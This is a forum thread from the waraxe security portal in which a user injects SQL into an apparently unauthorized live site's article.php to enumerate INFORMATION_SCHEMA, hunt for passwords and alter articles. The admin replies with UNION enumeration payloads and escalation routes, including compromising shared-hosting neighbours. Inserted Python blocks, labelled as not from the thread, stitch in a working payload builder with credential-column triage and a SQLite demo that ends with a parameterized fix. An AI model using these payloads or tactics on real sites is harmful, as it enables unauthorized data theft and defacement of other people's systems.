Waraxe IT Security Portal  
pro in SQL injection ??
PostPosted: Fri Jan 25, 2008 11:50 am
nox
Advanced user
Joined: Dec 29, 2007
Posts: 100
Location: c://windows/system32
Hi

I found an SQL injection exploit, where I go to INFORMATION_SCHEMA.TABLES.

I find all tables of the DB:

CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_VARIABLES
KEY_COLUMN_USAGE
PARTITIONS
PLUGINS
PROCESSLIST
REFERENTIAL_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
SESSION_STATUS
SESSION_VARIABLES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
article
article_type
author
cricket_results
date
general
inv_tips
last_ping
mailing_list
m_type
mbb
poll
poll_data
dt_1
test1

When I put: FROM article

I find all article IDs.

But when I put: FROM USER_PRIVILEGES

Query failed == 1146: Table 'marketviews2.USER_PRIVILEGES' doesn't exist

Please help me?

_________________
..::::[ Waraxe.us is the BEST and the TOP ]::::..
PostPosted: Fri Jan 25, 2008 5:26 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu
You see all table names from all databases you currently have access to. So those tables are coming from at least 2 databases: "INFORMATION_SCHEMA" and "marketviews2". Table "USER_PRIVILEGES" resides in the "INFORMATION_SCHEMA" database, not in your current database.

In your specific case, all UPPERCASE tables seem to be coming from "INFORMATION_SCHEMA" and lowercase tables are in the current database.

So "USER_PRIVILEGES" can be accessed as "INFORMATION_SCHEMA.USER_PRIVILEGES".
PostPosted: Sat Jan 26, 2008 10:31 am
nox
Advanced user
Joined: Dec 29, 2007
Posts: 100
Location: c://windows/system32
Thanks, it works 100%, but I can't find the name of the password & user.

Look here:

from information_schema.TABLES

Code:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_VARIABLES
KEY_COLUMN_USAGE
PARTITIONS
PLUGINS
PROCESSLIST
REFERENTIAL_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
SESSION_STATUS
SESSION_VARIABLES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
article
article_type
author
cricket_results
date
general
inv_tips
last_ping
mailing_list
msn_type
msnbb
poll
poll_data
dt_1
test1


mysql> select * from information_schema.USER_PRIVILEGES;
+-----------+---------------+----------------+--------------+
| GRANTEE | TABLE_CATALOG | PRIVILEGE_TYPE | IS_GRANTABLE |
+-----------+---------------+----------------+--------------+
| 'KK1'@'%' | NULL | USAGE | NO |
+-----------+---------------+----------------+--------------+
1 row in set (0.02 sec)

Code:
/article.php?ID=-999 UNION SELECT 0,GRANTEE,2,3,4,5,6,7,8,IS_GRANTABLE FROM information_schema.USER_PRIVILEGES;


I find: 'KK1'@'%' and NO

Please, how can I find the PASSWORD?
Look here please: http://www.xfocus.net/articles/200601/847.html

mysql> use information_schema;
Database changed
mysql> show tables;
+---------------------------------------+
| Tables_in_information_schema |
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| KEY_COLUMN_USAGE |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| VIEWS |
| USER_PRIVILEGES |
+---------------------------------------+
16 rows in set (0.17 sec)

mysql> select * from information_schema.USER_PRIVILEGES;
+-----------+---------------+----------------+--------------+
| GRANTEE | TABLE_CATALOG | PRIVILEGE_TYPE | IS_GRANTABLE |
+-----------+---------------+----------------+--------------+
| 'KK1'@'%' | NULL | USAGE | NO |
+-----------+---------------+----------------+--------------+
1 row in set (0.02 sec)

mysql> select TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME from information_schema.STATISTICS;
+--------------+------------+-------------+
| TABLE_SCHEMA | TABLE_NAME | COLUMN_NAME |
+--------------+------------+-------------+
| in | article | articleid |
| in | user | userid |
+--------------+------------+-------------+
2 rows in set (0.02 sec)

D:\mysql5\bin>mysql -uroot -p
Enter password: ******
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 4 to server version: 5.0.18

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> use in
Database changed
mysql> delimiter //
mysql> CREATE PROCEDURE test(id INT)
-> BEGIN
-> SELECT * FROM in.USER WHERE USERID=ID;
-> END//
Query OK, 0 rows affected (0.08 sec)

mysql> delimiter ;

mysql> call test(1);
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | angel | mypass |
+--------+----------+----------+
1 row in set (0.00 sec)

Query OK, 0 rows affected (0.00 sec)


SQL Injection

mysql> call test(1 and 1=1);
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | angel | mypass |
+--------+----------+----------+
1 row in set (0.00 sec)

Query OK, 0 rows affected (0.01 sec)

mysql> call test(1 and 1=2);
Empty set (0.00 sec)

Query OK, 0 rows affected (0.00 sec)


mysql> grant SELECT, INSERT, UPDATE, DELETE, EXECUTE
-> ON `IN`.*
-> TO 'KK1'@'%'
-> IDENTIFIED BY 'OBSCURE';
Query OK, 0 rows affected (0.03 sec)

SELECT, INSERT, UPDATE, DELETE, EXECUTE
D:\mysql5\bin>mysql -uKK1 -p
Enter password: ******
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 5 to server version: 5.0.18

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> select ROUTINE_SCHEMA,ROUTINE_NAME,DEFINER,ROUTINE_DEFINITION from information_schema.ROUTINES;
+----------------+--------------+----------------+--------------------+
| ROUTINE_SCHEMA | ROUTINE_NAME | DEFINER | ROUTINE_DEFINITION |
+----------------+--------------+----------------+--------------------+
| in | test | root@localhost | |
| in | tt | root@localhost | |
+----------------+--------------+----------------+--------------------+
2 rows in set (0.01 sec)


mysql> call in.test(1 and length(load_file('c:/boot.ini'))>0);
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | angel | mypass |
+--------+----------+----------+
1 row in set (0.00 sec)

Query OK, 0 rows affected (0.01 sec)

mysql> call in.test(1 and length(load_file('c:/boot.ini'))<0);
Empty set (0.00 sec)

Query OK, 0 rows affected (0.00 sec)



Help me, waraxe, please.

PostPosted: Sat Jan 26, 2008 1:28 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu
I don't think that you will find any names or passwords in "INFORMATION_SCHEMA". The next move can be COLUMNS enumeration.

Code:

/article.php?ID=-1 UNION ALL SELECT 0,TABLE_NAME,2,3,4,5,6,7,8,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS;


Then search for table names and column names which seem to be related to the web application's auth - anything like "user", "pass", "admin", "login", "account", "email", "editor", "customer", ...
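Added example, not code from the thread or from either poster: a small payload builder for the two enumeration steps waraxe describes in his replies above (listing INFORMATION_SCHEMA.TABLES with the schema qualified, then INFORMATION_SCHEMA.COLUMNS) plus the keyword triage he suggests. It assumes the thread's hypothetical target, /article.php?ID= with a 10-column SELECT where positions 1 and 9 are echoed; the sample rows at the bottom are constructed, not data from the thread.

```python
# Added example (not from the thread): payload builder for UNION-based
# enumeration of INFORMATION_SCHEMA, plus the keyword triage waraxe
# suggests. The injectable page /article.php?ID= and the 10-column SELECT
# with echoed positions are taken from the thread's payloads; the sample
# rows at the bottom are constructed for the demo.
from urllib.parse import quote

# Words waraxe lists as hints of an auth-related table or column.
AUTH_WORDS = ("user", "pass", "admin", "login", "account", "email",
              "editor", "customer")


def hex_literal(s):
    """MySQL 0x.. string literal: no quote characters needed, so it
    survives addslashes()/magic_quotes in the vulnerable PHP."""
    return "0x" + s.encode("utf-8").hex()


def union_payload(ncols, exprs, table, where=None):
    """Value for the ID parameter: -1 (no real row) UNION ALL SELECT with
    `ncols` columns. `exprs` maps a column position to the expression to
    show there; every other position gets its index as a number, which is
    the thread's 0,1,2,... trick for finding which positions are echoed."""
    cols = [exprs.get(i, str(i)) for i in range(ncols)]
    sql = "-1 UNION ALL SELECT " + ",".join(cols) + " FROM " + table
    if where:
        sql += " WHERE " + where
    return sql


def tables_payload(ncols, slot, current_db_only=True):
    """List tables with their schema in one echoed slot. Selecting
    TABLE_SCHEMA too removes the upper/lower-case guessing: every
    INFORMATION_SCHEMA.* name shows as 'information_schema:NAME' and
    application tables as 'marketviews2:name'. Filtering on DATABASE()
    drops the former entirely."""
    exprs = {slot: "CONCAT_WS(0x3a,TABLE_SCHEMA,TABLE_NAME)"}
    where = "TABLE_SCHEMA=DATABASE()" if current_db_only else None
    return union_payload(ncols, exprs, "INFORMATION_SCHEMA.TABLES", where)


def columns_payload(ncols, slot, table_name=None):
    """Column enumeration, optionally restricted to one table."""
    exprs = {slot: "CONCAT_WS(0x3a,TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME)"}
    where = "TABLE_SCHEMA=DATABASE()"
    if table_name:
        where += " AND TABLE_NAME=" + hex_literal(table_name)
    return union_payload(ncols, exprs, "INFORMATION_SCHEMA.COLUMNS", where)


def request_url(path, param, payload):
    """Full GET URL with the payload percent-encoded; spaces become %20
    so the query string is not split by the client."""
    return path + "?" + param + "=" + quote(payload, safe="(),=:")


def triage(rows, words=AUTH_WORDS):
    """Pick schema:table:column rows whose table or column name contains
    one of the auth-related words. Returns (schema, table, column)."""
    hits = []
    for row in rows:
        schema, table, column = row.split(":", 2)
        if any(w in table.lower() or w in column.lower() for w in words):
            hits.append((schema, table, column))
    return hits


# Constructed sample of what the echoed slot would show after the
# columns payload; not real data from the thread's target.
SAMPLE_ROWS = [
    "marketviews2:article:id",
    "marketviews2:article:title",
    "marketviews2:author:id",
    "marketviews2:author:email",
    "marketviews2:mailing_list:email",
    "marketviews2:general:admin_pass",
]

if __name__ == "__main__":
    print(request_url("/article.php", "ID", tables_payload(10, 1)))
    print(request_url("/article.php", "ID", columns_payload(10, 1, "author")))
    for hit in triage(SAMPLE_ROWS):
        print("candidate:", hit)
```

The WHERE TABLE_SCHEMA=DATABASE() filter is what separates the application's tables from the INFORMATION_SCHEMA ones without relying on case; the 0x.. literals keep the payloads free of quote characters, which matters when the application applies addslashes() to GET input.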
PostPosted: Sat Jan 26, 2008 1:33 pm
nox
Advanced user
Joined: Dec 29, 2007
Posts: 100
Location: c://windows/system32
OK, I didn't find the password; now I want to edit article.php.

The UPDATE command?


/UNION SELECT 0,1,2,3,4,5,6,7 FROM article--

It works.

All column names of article: title, .....

article:id
article:title
article:author_id
article:date_id
article:add_date
article:edit_date
article:intro
article:body
article:sort
article:link
article:image
article:type
article:status
article:sn_type
article:sn_status

Now tell me how I can edit an article [ HTML ] with UPDATE.

Thanks for everything, waraxe.

PostPosted: Sat Jan 26, 2008 1:44 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu
It's MySQL 5.x, right?

Then you can't use multiple queries in SQL injection. Database modification can be done only with other methods:

1. Find an SQL injection in an UPDATE query which handles the right table.
2. Get PHP-level access and execute your own SQL queries.
3. Find out the database credentials and, if port 3306 is open to the world, try to manipulate the database remotely (in most cases impossible, because the MySQL port usually is not open outside the internal network perimeter).
4. If the web application has an admin/editor backend interface, try to log in and make the needed changes. Or elevate privileges from webapp admin/editor/author/moderator/etc. to PHP code execution and then use your own SQL queries.
5. If the website is located on a shared hosting server, then look for neighbour websites on the same server and try to find the weakest link in order to get access to the server. If the hosting server's security measures are not tight enough, then you may be able to get access to all the other websites' files and databases ...
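Added example, not code from the thread or from the poster: a stand-in for the vulnerable article.php lookup that reproduces what waraxe's reply states, namely that a UNION in the ID parameter reads other tables while a stacked ";UPDATE" is refused by an API that sends one statement per call, and that binding the parameter stops both. It assumes no MySQL server and uses an in-memory SQLite database instead; sqlite3's execute() accepts exactly one statement, which is the same restriction PHP's mysql_query() imposes on MySQL 5. The table and column names follow the thread (article, author); the rows are constructed.

```python
# Added example (not from the thread): a stand-in for the vulnerable
# article.php lookup, run against an in-memory SQLite database because
# no MySQL server is assumed. sqlite3's execute() accepts one statement
# per call, the same restriction PHP's mysql_query() puts on MySQL 5, so
# it reproduces the behaviour waraxe's reply describes. Table and column
# names follow the thread (article, author); the rows are constructed.
import sqlite3


def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE article(id INTEGER, title TEXT, body TEXT);
        CREATE TABLE author(id INTEGER, login TEXT, pass TEXT);
        INSERT INTO article VALUES (1, 'Hello', '<p>hi</p>');
        INSERT INTO author  VALUES (1, 'editor', 's3cret');
    """)
    return con


def article_vulnerable(con, id_param):
    """String concatenation, as in the thread's article.php."""
    sql = "SELECT id,title,body FROM article WHERE id=" + id_param
    return con.execute(sql).fetchall()


def article_safe(con, id_param):
    """Hardened lookup: the parameter is validated as an integer and
    bound as a value, never spliced into SQL text."""
    article_id = int(id_param)      # raises ValueError on any injection
    return con.execute("SELECT id,title,body FROM article WHERE id=?",
                       (article_id,)).fetchall()


def demo():
    con = make_db()
    out = {}

    # 1. UNION inside the single SELECT: reads the author table.
    out["union"] = article_vulnerable(
        con, "-1 UNION ALL SELECT id,login,pass FROM author")

    # 2. Stacked UPDATE: rejected by a one-statement-per-call API, so
    #    the injection can read but not write (waraxe's point).
    try:
        article_vulnerable(
            con, "1; UPDATE article SET body='owned' WHERE id=1")
        out["stacked"] = "executed"
    except (sqlite3.ProgrammingError, sqlite3.Warning):
        out["stacked"] = "rejected"
    out["body_after"] = con.execute(
        "SELECT body FROM article WHERE id=1").fetchone()[0]

    # 3. Parameterized version: the same payload is not SQL at all.
    try:
        article_safe(con, "-1 UNION ALL SELECT id,login,pass FROM author")
        out["safe_union"] = "executed"
    except ValueError:
        out["safe_union"] = "rejected"
    out["safe_ok"] = article_safe(con, "1")
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

The read-but-not-write property depends on the client API, not on MySQL itself: PHP's old mysql_query() never enables multi-statement execution, but mysqli::multi_query() or PDO_MySQL with emulated prepared statements would let the stacked UPDATE run. The only fix that holds regardless of API is the bound parameter with type validation shown in article_safe().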
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"